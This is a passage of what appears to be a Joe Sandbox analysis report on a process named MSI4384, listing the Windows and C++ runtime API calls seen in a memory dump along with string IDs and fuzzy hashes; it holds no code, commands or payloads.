  • Part of subcall function 0042EA80: std::_Lockit::_Lockit.LIBCPMT ref: 0042EAAD
  • Part of subcall function 0042EA80: std::_Lockit::_Lockit.LIBCPMT ref: 0042EAD0
  • Part of subcall function 0042EA80: std::_Lockit::~_Lockit.LIBCPMT ref: 0042EAF8
  • Part of subcall function 0042EA80: std::_Lockit::~_Lockit.LIBCPMT ref: 0042EBA1
  • Part of subcall function 004349F5: Concurrency::cancel_current_task.LIBCPMT ref: 00434AB8
  • Part of subcall function 0043A55D: __EH_prolog3.LIBCMT ref: 0043A564
  • Part of subcall function 0043A55D: std::_Lockit::_Lockit.LIBCPMT ref: 0043A56E
  • Part of subcall function 0043A55D: std::_Lockit::~_Lockit.LIBCPMT ref: 0043A5DF
• __Getcoll.LIBCPMT ref: 0043ECC3
  • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
  • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
  • Part of subcall function 00428700: LocalAlloc.KERNEL32(00000040,00000000,0044A1C5,00000000,F3E52339,?,00000000,?,FFFFFFFF,?,0046EB28,000000FF,?,004217A4,?,0046FDDA), ref: 00428706
  • Part of subcall function 0042BCF0: __Getctype.LIBCPMT ref: 0042BCFB
  • Part of subcall function 0043A970: __EH_prolog3.LIBCMT ref: 0043A977
  • Part of subcall function 0043A970: std::_Lockit::_Lockit.LIBCPMT ref: 0043A981
  • Part of subcall function 0043AA9A: __EH_prolog3.LIBCMT ref: 0043AAA1
  • Part of subcall function 0043AA9A: std::_Lockit::_Lockit.LIBCPMT ref: 0043AAAB
  • Part of subcall function 0043ACEE: __EH_prolog3.LIBCMT ref: 0043ACF5
  • Part of subcall function 0043ACEE: std::_Lockit::_Lockit.LIBCPMT ref: 0043ACFF
  • Part of subcall function 0043ACEE: std::_Lockit::~_Lockit.LIBCPMT ref: 0043AD70
  • Part of subcall function 0043AC59: __EH_prolog3.LIBCMT ref: 0043AC60
  • Part of subcall function 0043AC59: std::_Lockit::_Lockit.LIBCPMT ref: 0043AC6A
  • Part of subcall function 0043AC59: std::_Lockit::~_Lockit.LIBCPMT ref: 0043ACDB
  • Part of subcall function 004349F5: __EH_prolog3.LIBCMT ref: 004349FC
  • Part of subcall function 004349F5: std::_Lockit::_Lockit.LIBCPMT ref: 00434A06
  • Part of subcall function 004349F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00434AAD
Strings
Similarity
• API ID: Lockitstd::_$Lockit::_$H_prolog3$Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalnumpunct
• String ID: 9H$@:H$D:H$H:H$L:H$P:H$T:H$X:H$\:H
• API String ID: 1748785662-2847461705
APIs
• __EH_prolog3.LIBCMT ref: 0043E63C
• numpunct.LIBCPMT ref: 0043EA21
  • Part of subcall function 0043B233: __EH_prolog3.LIBCMT ref: 0043B23A
  • Part of subcall function 0043AFD7: __EH_prolog3.LIBCMT ref: 0043AFDE
  • Part of subcall function 0043AFD7: std::_Lockit::_Lockit.LIBCPMT ref: 0043AFE8
  • Part of subcall function 0043AFD7: std::_Lockit::~_Lockit.LIBCPMT ref: 0043B059
  • Part of subcall function 0043B101: __EH_prolog3.LIBCMT ref: 0043B108
  • Part of subcall function 0043B101: std::_Lockit::_Lockit.LIBCPMT ref: 0043B112
  • Part of subcall function 0043B101: std::_Lockit::~_Lockit.LIBCPMT ref: 0043B183
  • Part of subcall function 004349F5: Concurrency::cancel_current_task.LIBCPMT ref: 00434AB8
  • Part of subcall function 0043A4C8: __EH_prolog3.LIBCMT ref: 0043A4CF
  • Part of subcall function 0043A4C8: std::_Lockit::_Lockit.LIBCPMT ref: 0043A4D9
  • Part of subcall function 0043A4C8: std::_Lockit::~_Lockit.LIBCPMT ref: 0043A54A
• __Getcoll.LIBCPMT ref: 0043E7F1
  • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
  • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
  • Part of subcall function 00428700: LocalAlloc.KERNEL32(00000040,00000000,0044A1C5,00000000,F3E52339,?,00000000,?,FFFFFFFF,?,0046EB28,000000FF,?,004217A4,?,0046FDDA), ref: 00428706
  • Part of subcall function 0043E13A: __Getctype.LIBCPMT ref: 0043E149
  • Part of subcall function 0043A8DB: __EH_prolog3.LIBCMT ref: 0043A8E2
  • Part of subcall function 0043A8DB: std::_Lockit::_Lockit.LIBCPMT ref: 0043A8EC
  • Part of subcall function 0043AA05: __EH_prolog3.LIBCMT ref: 0043AA0C
  • Part of subcall function 0043AA05: std::_Lockit::_Lockit.LIBCPMT ref: 0043AA16
  • Part of subcall function 0043ABC4: __EH_prolog3.LIBCMT ref: 0043ABCB
  • Part of subcall function 0043ABC4: std::_Lockit::_Lockit.LIBCPMT ref: 0043ABD5
  • Part of subcall function 0043ABC4: std::_Lockit::~_Lockit.LIBCPMT ref: 0043AC46
  • Part of subcall function 0043AB2F: __EH_prolog3.LIBCMT ref: 0043AB36
  • Part of subcall function 0043AB2F: std::_Lockit::_Lockit.LIBCPMT ref: 0043AB40
  • Part of subcall function 004349F5: __EH_prolog3.LIBCMT ref: 004349FC
  • Part of subcall function 004349F5: std::_Lockit::_Lockit.LIBCPMT ref: 00434A06
  • Part of subcall function 004349F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00434AAD
Strings
Similarity
• API ID: Lockitstd::_$H_prolog3$Lockit::_$Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalnumpunct
• String ID: `:H$d:H$h:H$l:H$p:H$t:H$x:H$|:H
• API String ID: 3146296281-1933110371
APIs
• __Getcoll.LIBCPMT ref: 0043E7F1
  • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
  • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
  • Part of subcall function 00428700: LocalAlloc.KERNEL32(00000040,00000000,0044A1C5,00000000,F3E52339,?,00000000,?,FFFFFFFF,?,0046EB28,000000FF,?,004217A4,?,0046FDDA), ref: 00428706
  • Part of subcall function 0043E13A: __Getctype.LIBCPMT ref: 0043E149
Strings
Similarity
• API ID: Lockitstd::_$AllocGetcollGetctypeLocalLockit::_Lockit::~_
• String ID: `:H$d:H$h:H$l:H$p:H$t:H$x:H$|:H
• API String ID: 462355747-1933110371
APIs
• LocalAlloc.KERNEL32(00000040,00000018,F3E52339,00000000,?), ref: 0042F546
• std::_Lockit::_Lockit.LIBCPMT ref: 0042F580
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042F5E4
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0042F77B
• std::_Lockit::~_Lockit.LIBCPMT ref: 0042F82F
• Concurrency::cancel_current_task.LIBCPMT ref: 0042F857
Strings
Similarity
• API ID: std::_$Locinfo::_Lockit$AllocConcurrency::cancel_current_taskLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name$false$true
• API String ID: 975656625-1062449267
APIs
• OpenProcess.KERNEL32(00000400,00000000,?,F3E52339,?,00000000), ref: 00426BA5
• OpenProcess.KERNEL32(00000400,00000000,00000000,?,F3E52339,?,00000000), ref: 00426BC6
• GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,F3E52339,?,00000000), ref: 00426BF9
• GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,F3E52339,?,00000000), ref: 00426C0A
• CloseHandle.KERNEL32(00000000,?,F3E52339,?,00000000), ref: 00426C28
• CloseHandle.KERNEL32(00000000,?,F3E52339,?,00000000), ref: 00426C4C
• CloseHandle.KERNEL32(00000000,?,F3E52339,?,00000000), ref: 00426C78
• CloseHandle.KERNEL32(00000000,?,F3E52339,?,00000000), ref: 00426C98
• CloseHandle.KERNEL32(00000000,?,F3E52339,?,00000000), ref: 00426CBA
• CloseHandle.KERNEL32(00000000,?,F3E52339,?,00000000), ref: 00426CDA
Similarity
• API ID: CloseHandle$Process$OpenTimes
• String ID:
• API String ID: 1711917922-0
APIs
• GetTempFileNameW.KERNEL32(?,URL,00000000,?,F3E52339,?,00000004), ref: 00425A6A
• LocalFree.KERNEL32(?), ref: 00425B7B
• MoveFileW.KERNEL32(?,00000000), ref: 00425E1B
• DeleteFileW.KERNEL32(?), ref: 00425E63
• LocalFree.KERNEL32(?), ref: 00425EFD
• LocalFree.KERNEL32(?), ref: 00425FB2
Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                     • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: FileFreeLocal$DeleteMoveNameTemp
                                                                    • String ID: URL$url
                                                                    • API String ID: 1227976696-346267919
                                                                    • Opcode ID: e2b3049dbd996668e82250c5dec95296d85e106f8f65c2bc0186dc50a7960ecf
                                                                    • Instruction ID: 66b9d27d7b3735f27aebde2f0967a70903e7a17effb2160f93747ed35ae1f182
                                                                    • Opcode Fuzzy Hash: e2b3049dbd996668e82250c5dec95296d85e106f8f65c2bc0186dc50a7960ecf
                                                                    • Instruction Fuzzy Hash: 55027870E146299ADB24DF24D998B9DB7B0FF54304F5042DAE409A7291EB78AFC4CF84
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00447637
                                                                      • Part of subcall function 0042C840: std::_Lockit::_Lockit.LIBCPMT ref: 0042C86D
                                                                      • Part of subcall function 0042C840: std::_Lockit::_Lockit.LIBCPMT ref: 0042C890
                                                                      • Part of subcall function 0042C840: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C8B8
                                                                      • Part of subcall function 0042C840: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C961
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                     • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                    • API String ID: 1383202999-2891247106
                                                                    • Opcode ID: c33188f14cd0c96948b77993b9e8e2fd7bd8b94bbc99b8cb93d369c1d41d77e5
                                                                    • Instruction ID: a9875291ce45ec1aa16935fc7fdc427faca8657e73f5b8ec901a25fd97463f77
                                                                    • Opcode Fuzzy Hash: c33188f14cd0c96948b77993b9e8e2fd7bd8b94bbc99b8cb93d369c1d41d77e5
                                                                    • Instruction Fuzzy Hash: 7AC172B250410AABFF18DF58C959DFB7BBCEB08304F14411BFA06A6251D7389A12CB69
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00441AC7
                                                                      • Part of subcall function 0043A71C: __EH_prolog3.LIBCMT ref: 0043A723
                                                                      • Part of subcall function 0043A71C: std::_Lockit::_Lockit.LIBCPMT ref: 0043A72D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                     • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3$LockitLockit::_std::_
                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                    • API String ID: 2181796688-2891247106
                                                                    • Opcode ID: 1348e3c43549a86dadaf045b913c6d2f5b038fdb8fc0345cf24e71f0dd921e64
                                                                    • Instruction ID: 069e5e2681d2b9378c5b0fab20ef4f3d02b290752420727be77fc81481724f79
                                                                    • Opcode Fuzzy Hash: 1348e3c43549a86dadaf045b913c6d2f5b038fdb8fc0345cf24e71f0dd921e64
                                                                    • Instruction Fuzzy Hash: 00C1A5B6940109ABEB14DF98CD95DFB3BB8EF09304F14411BFA46E3261D638DA50CB69
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00441EC7
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::_Lockit.LIBCPMT ref: 0042B81D
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::_Lockit.LIBCPMT ref: 0042B840
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B868
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B911
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                     • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                    • API String ID: 1383202999-2891247106
                                                                    • Opcode ID: cfa74215ee0f83e5c5225e34156a423b9c8957650ba80617cc182d6d679eb459
                                                                    • Instruction ID: af1a0b13ca94c2752e36a16c562249f0c3892806ac3f9c5066fafa79a9180750
                                                                    • Opcode Fuzzy Hash: cfa74215ee0f83e5c5225e34156a423b9c8957650ba80617cc182d6d679eb459
                                                                    • Instruction Fuzzy Hash: 36C1C7B650010AABEB18DF58CE55DFF3BF8BB08304F54425BFA42A3251D6B4DA01CB69
                                                                    APIs
                                                                      • Part of subcall function 00426150: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 004261B5
                                                                      • Part of subcall function 00426150: LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,000000FF,0046B8CD,000000FF), ref: 0042620F
                                                                      • Part of subcall function 00426150: GetLastError.KERNEL32(?,?,?,000000FF,0046B8CD,000000FF), ref: 0042626B
                                                                    • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00426726
                                                                    • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000), ref: 00426794
                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000), ref: 004267FB
                                                                    • GetLastError.KERNEL32 ref: 004269AC
                                                                    • FreeLibrary.KERNEL32(?), ref: 00426A05
                                                                    Strings
                                                                    • NtQueryInformationProcess, xrefs: 00426720
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                     • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastLibraryMemoryProcessRead$AddressDirectoryFreeLoadProcSystem
                                                                    • String ID: NtQueryInformationProcess
                                                                    • API String ID: 1101900967-2781105232
                                                                    • Opcode ID: 150b50734034c2c79ad0eceb17b727d86d8c955bf97fe06e45b045fd74dedbd9
                                                                    • Instruction ID: 3561f0fd6ec8837b845eb3c84c47d17ca7c2a0db24dfcd47308aa116d25c9d12
                                                                    • Opcode Fuzzy Hash: 150b50734034c2c79ad0eceb17b727d86d8c955bf97fe06e45b045fd74dedbd9
                                                                    • Instruction Fuzzy Hash: 93B17170D00755DBDB20CF64D9497AEBBF4EF44308F10465ED449A7280E7B96AC8CB95
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0043E18F
                                                                    • _Maklocstr.LIBCPMT ref: 0043E1F8
                                                                    • _Maklocstr.LIBCPMT ref: 0043E20A
                                                                    • _Maklocchr.LIBCPMT ref: 0043E222
                                                                    • _Maklocchr.LIBCPMT ref: 0043E232
                                                                    • _Getvals.LIBCPMT ref: 0043E254
                                                                      • Part of subcall function 00437DCC: _Maklocchr.LIBCPMT ref: 00437DFB
                                                                      • Part of subcall function 00437DCC: _Maklocchr.LIBCPMT ref: 00437E11
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                     • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                    • String ID: false$true
                                                                    • API String ID: 3549167292-2658103896
                                                                    • Opcode ID: e03468237f7841b86465ba056d818d6fcab5f2da574143b817a4399867726c26
                                                                    • Instruction ID: aedd63e013cac718f51bdf1042580d2db0f7ece55b5e639eca2af82dfa604884
                                                                    • Opcode Fuzzy Hash: e03468237f7841b86465ba056d818d6fcab5f2da574143b817a4399867726c26
                                                                    • Instruction Fuzzy Hash: 5F2186B1D00314AADF14EFA6D845ADFBB78AF08714F00805BF9159F282EB78D554CBA5
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0043083F
                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00430881
                                                                      • Part of subcall function 00430780: LocalFree.KERNEL32(?,00000000,00000000,?,?,F3E52339,F3E52339,00000000,?), ref: 00430A66
                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 004308F4
                                                                    • LocalFree.KERNEL32(?), ref: 00430931
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                     • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Local$AllocFree$___std_exception_copy
                                                                    • String ID: ios_base::failbit set$iostream
                                                                    • API String ID: 2276494016-302468714
                                                                    • Opcode ID: ab0506274f9b927ea01e7c15639a724811e99ec55be043e951271e5733f6e4e3
                                                                    • Instruction ID: 8b09d6a16835cd7d3010c7f775fdaa69d65d4d6ff8128d05a599cab53b762cf4
                                                                    • Opcode Fuzzy Hash: ab0506274f9b927ea01e7c15639a724811e99ec55be043e951271e5733f6e4e3
                                                                    • Instruction Fuzzy Hash: CBA1D1B1D00208DFDB18DF68D894BAEBBB5EF49310F10836EE855AB381D7789944CB95
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,00000044,F3E52339,00000000,?), ref: 0042BD9B
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042BDD8
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042BE45
                                                                    • __Getctype.LIBCPMT ref: 0042BE8E
                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0042BF02
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042BFBF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                     • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 3635123611-1405518554
                                                                    • Opcode ID: fad51948bbd20331e73f4a1f0ede8a342dcf8697b1da4014d850e4081b1088f2
                                                                    • Instruction ID: a82eacf9ac0b5fd6683239e28415a49bb1eb1883c47a56f6960c5927cddd2338
                                                                    • Opcode Fuzzy Hash: fad51948bbd20331e73f4a1f0ede8a342dcf8697b1da4014d850e4081b1088f2
                                                                    • Instruction Fuzzy Hash: 7B8191B0D04398DAEB10CFA9C94578EBBF4BF14308F14819ED544EB382E7799A44CB95
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,00000018,F3E52339,00000000,?,?,?,?,?,?,?,?,00000000,0046C8F5,000000FF), ref: 0042C504
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042C53E
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042C5A2
                                                                    • __Getctype.LIBCPMT ref: 0042C5EB
                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0042C631
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042C6E5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                     • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 3635123611-1405518554
                                                                    • Opcode ID: 9fe351d952268612cc4ee529971a5bc16fd1704ce4f3d85b19c85112cd37ad4c
                                                                    • Instruction ID: d37f22507405cc141cd43053f83e81b09e455128f28b3fac20abef2ac2d45fdf
                                                                    • Opcode Fuzzy Hash: 9fe351d952268612cc4ee529971a5bc16fd1704ce4f3d85b19c85112cd37ad4c
                                                                    • Instruction Fuzzy Hash: 48616EB0E01398EAEB10DFA9D5447CEBFF4AF15308F14815AE454AB381E7B99A04CB55
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(?,?), ref: 004492A8
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00449334
                                                                    • __alloca_probe_16.LIBCMT ref: 0044935E
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044939F
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 004493BB
                                                                    • __alloca_probe_16.LIBCMT ref: 004493E1
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044941E
                                                                    • CompareStringEx.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0044943B
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                     • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                    • String ID:
                                                                    • API String ID: 3603178046-0
                                                                    • Opcode ID: 8de7f6672bd6a31d931f288e0370ab5f903ef79bfc5f46a054c764ab85a4a322
                                                                    • Instruction ID: 6ad191cf17f5a1f53389c6bd3fcd6a964ecc0202720cb9e7417e60d5db2cd9b2
                                                                    • Opcode Fuzzy Hash: 8de7f6672bd6a31d931f288e0370ab5f903ef79bfc5f46a054c764ab85a4a322
                                                                    • Instruction Fuzzy Hash: 8971F472904205ABFF208FA5CC85BEFBBB5AF0A714F14016AEC00A7291D77C8C05E768
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,0042C98F,?,00000001,00000000,00000000,?,?,0042C98F,?), ref: 00448D47
                                                                    • __alloca_probe_16.LIBCMT ref: 00448D73
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,0042C98F,?,?,00000000,0042CFE3,0000003F,?), ref: 00448DB2
                                                                    • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0042C98F,?,?,00000000,0042CFE3,0000003F), ref: 00448DCF
                                                                    • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,0042C98F,?,?,00000000,0042CFE3,0000003F), ref: 00448E0E
                                                                    • __alloca_probe_16.LIBCMT ref: 00448E2B
                                                                    • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0042C98F,?,?,00000000,0042CFE3,0000003F), ref: 00448E6D
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,0042C98F,?,?,00000000,0042CFE3,0000003F,?), ref: 00448E90
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                    • String ID:
                                                                    • API String ID: 2040435927-0
                                                                    • Opcode ID: ac61388c8897050de777ffe7bea0832b8123a91d572e9f478f7e86d3faa48ab9
